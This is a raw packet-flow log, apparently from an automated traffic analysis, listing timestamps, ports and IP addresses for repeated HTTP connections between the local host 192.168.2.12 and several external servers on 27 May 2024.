May 27, 2024 12:22:42.146542072 CEST	80	49758	199.59.243.225	192.168.2.12
May 27, 2024 12:22:42.146557093 CEST	80	49758	199.59.243.225	192.168.2.12
May 27, 2024 12:22:42.146588087 CEST	49758	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:42.146662951 CEST	49758	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:43.582144976 CEST	49758	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:44.600161076 CEST	49759	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:44.605173111 CEST	80	49759	199.59.243.225	192.168.2.12
May 27, 2024 12:22:44.605247974 CEST	49759	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:44.607484102 CEST	49759	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:44.612356901 CEST	80	49759	199.59.243.225	192.168.2.12
May 27, 2024 12:22:45.082082033 CEST	80	49759	199.59.243.225	192.168.2.12
May 27, 2024 12:22:45.082099915 CEST	80	49759	199.59.243.225	192.168.2.12
May 27, 2024 12:22:45.082113028 CEST	80	49759	199.59.243.225	192.168.2.12
May 27, 2024 12:22:45.082232952 CEST	49759	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:45.082282066 CEST	49759	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:45.084461927 CEST	49759	80	192.168.2.12	199.59.243.225
May 27, 2024 12:22:45.092998981 CEST	80	49759	199.59.243.225	192.168.2.12
May 27, 2024 12:22:50.819263935 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:50.824440956 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:50.824614048 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:50.826297998 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:50.831197023 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.842976093 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.842997074 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843010902 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843022108 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843034983 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843046904 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843061924 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843071938 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843066931 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:51.843084097 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843101978 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.843158960 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:51.843158960 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:51.843158960 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:51.853596926 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.853693008 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:51.853740931 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:52.127463102 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:52.127481937 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:52.127496004 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:52.127507925 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:52.127523899 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:52.127557039 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:52.127557039 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:52.127688885 CEST	80	49760	103.120.178.210	192.168.2.12
May 27, 2024 12:22:52.127753019 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:52.331901073 CEST	49760	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:53.350651026 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:53.355700016 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:53.355818033 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:53.359325886 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:53.364268064 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407593012 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407609940 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407624006 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407727957 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407741070 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407752991 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407763958 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407778025 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407789946 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.407802105 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.408020020 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:54.408020973 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:54.418256044 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.418282032 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.418293953 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.425249100 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:54.695476055 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.695497990 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.695512056 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.695833921 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.695847034 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.695858955 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.695975065 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:54.695975065 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:54.696096897 CEST	80	49761	103.120.178.210	192.168.2.12
May 27, 2024 12:22:54.699213982 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:54.863240004 CEST	49761	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:55.882071018 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:55.887346983 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:55.887451887 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:55.889832973 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:55.894782066 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:55.895023108 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.394525051 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484515905 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484534025 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484546900 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484563112 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484589100 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484616041 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484627008 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484639883 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484639883 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484659910 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484673023 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484688044 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484700918 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484724045 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484746933 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484755039 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484769106 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484786034 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484810114 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.484853983 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.484889984 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.485121965 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.485167980 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:57.487137079 CEST	80	49762	103.120.178.210	192.168.2.12
May 27, 2024 12:22:57.487184048 CEST	49762	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:58.413346052 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:58.418344021 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:58.425147057 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:58.425147057 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:58.430083990 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457406998 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457423925 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457453966 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457470894 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457483053 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457494974 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457505941 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457516909 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457528114 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457535982 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.457542896 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.457587957 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.457600117 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.462570906 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.462616920 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.462662935 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.463093042 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.503371954 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.752360106 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.752383947 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.752397060 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.752408981 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.752423048 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.752468109 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.752597094 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:22:59.752643108 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.755867004 CEST	49763	80	192.168.2.12	103.120.178.210
May 27, 2024 12:22:59.761075020 CEST	80	49763	103.120.178.210	192.168.2.12
May 27, 2024 12:23:04.907188892 CEST	49764	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:04.912174940 CEST	80	49764	217.107.219.102	192.168.2.12
May 27, 2024 12:23:04.915352106 CEST	49764	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:04.918699026 CEST	49764	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:04.923602104 CEST	80	49764	217.107.219.102	192.168.2.12
May 27, 2024 12:23:05.672357082 CEST	80	49764	217.107.219.102	192.168.2.12
May 27, 2024 12:23:05.672383070 CEST	80	49764	217.107.219.102	192.168.2.12
May 27, 2024 12:23:05.672445059 CEST	49764	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:06.428847075 CEST	49764	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:07.451245070 CEST	49765	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:07.648473024 CEST	80	49765	217.107.219.102	192.168.2.12
May 27, 2024 12:23:07.648554087 CEST	49765	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:07.650634050 CEST	49765	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:07.655643940 CEST	80	49765	217.107.219.102	192.168.2.12
May 27, 2024 12:23:08.334196091 CEST	80	49765	217.107.219.102	192.168.2.12
May 27, 2024 12:23:08.334342957 CEST	80	49765	217.107.219.102	192.168.2.12
May 27, 2024 12:23:08.334531069 CEST	49765	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:09.159816027 CEST	49765	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:10.179861069 CEST	49766	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:10.286420107 CEST	80	49766	217.107.219.102	192.168.2.12
May 27, 2024 12:23:10.286499023 CEST	49766	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:10.288647890 CEST	49766	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:10.293535948 CEST	80	49766	217.107.219.102	192.168.2.12
May 27, 2024 12:23:10.293667078 CEST	80	49766	217.107.219.102	192.168.2.12
May 27, 2024 12:23:10.984122992 CEST	80	49766	217.107.219.102	192.168.2.12
May 27, 2024 12:23:11.034595966 CEST	49766	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:11.107614994 CEST	80	49766	217.107.219.102	192.168.2.12
May 27, 2024 12:23:11.111351967 CEST	49766	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:11.800254107 CEST	49766	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:12.819188118 CEST	49767	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:12.824217081 CEST	80	49767	217.107.219.102	192.168.2.12
May 27, 2024 12:23:12.827653885 CEST	49767	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:12.830565929 CEST	49767	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:12.835486889 CEST	80	49767	217.107.219.102	192.168.2.12
May 27, 2024 12:23:13.534738064 CEST	80	49767	217.107.219.102	192.168.2.12
May 27, 2024 12:23:13.535042048 CEST	80	49767	217.107.219.102	192.168.2.12
May 27, 2024 12:23:13.535094023 CEST	49767	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:13.538099051 CEST	49767	80	192.168.2.12	217.107.219.102
May 27, 2024 12:23:13.544181108 CEST	80	49767	217.107.219.102	192.168.2.12
May 27, 2024 12:23:19.377672911 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:19.382617950 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:19.382708073 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:19.385010004 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:19.390135050 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478626013 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478648901 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478662014 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478678942 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478691101 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478701115 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478717089 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.478729963 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478740931 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478751898 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.478760958 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478775024 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.478782892 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.483882904 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.483901978 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.483938932 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.485146046 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.569355011 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.615147114 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.669498920 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669514894 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669526100 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669670105 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.669732094 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669744015 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669754028 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669764996 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669775009 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.669873953 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.669873953 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.670705080 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.670880079 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.670890093 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.671772957 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.671787977 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.671798944 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.671808004 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.671813965 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.671926975 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.671926975 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.675647020 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.675657988 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.675667048 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.675678015 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.675688028 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.675795078 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.675807953 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.679430962 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.703819036 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.703829050 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.703955889 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.758199930 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.758227110 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.758241892 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.758518934 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.864408970 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864499092 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864511013 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864543915 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864556074 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864567995 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864579916 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864593983 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.864609003 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.864702940 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.865319014 CEST	80	49768	202.233.67.46	192.168.2.12
May 27, 2024 12:23:20.865443945 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:20.895139933 CEST	49768	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:21.915298939 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:21.925277948 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:21.925369978 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:21.929042101 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:21.935779095 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841356039 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841434002 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841451883 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841464996 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841475010 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841485977 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841497898 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841511965 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841519117 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:22.841535091 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:22.841540098 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841552019 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.841562986 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:22.841630936 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:22.846613884 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.846625090 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.846636057 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:22.846755981 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:22.899136066 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.036056042 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036158085 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036170006 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036184072 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036271095 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.036271095 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.036416054 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036453962 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036596060 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036613941 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036624908 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036636114 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036649942 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.036676884 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.037215948 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.037386894 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.037447929 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.037460089 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.037475109 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.037487984 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.037499905 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.037513018 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.037595987 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.038316965 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.038345098 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.038363934 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.038377047 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.038389921 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.038398027 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.038419962 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.039238930 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.039278030 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.041203022 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.041259050 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.041274071 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.047139883 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.126842976 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.175185919 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.231962919 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.231980085 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.231992960 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232003927 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232017040 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232028008 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232045889 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232055902 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.232069969 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232084036 CEST	80	49769	202.233.67.46	192.168.2.12
May 27, 2024 12:23:23.232095003 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.232126951 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:23.440824032 CEST	49769	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:24.459125996 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:24.464162111 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:24.469042063 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:24.469042063 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:24.473925114 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:24.474052906 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.366863012 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.366882086 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.366936922 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.366991043 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.367003918 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.367031097 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.367050886 CEST	80	49770	202.233.67.46	192.168.2.12
May 27, 2024 12:23:25.367068052 CEST	49770	80	192.168.2.12	202.233.67.46
May 27, 2024 12:23:25.367084026 CEST	80	49770	202.233.67.46	192.168.2.12
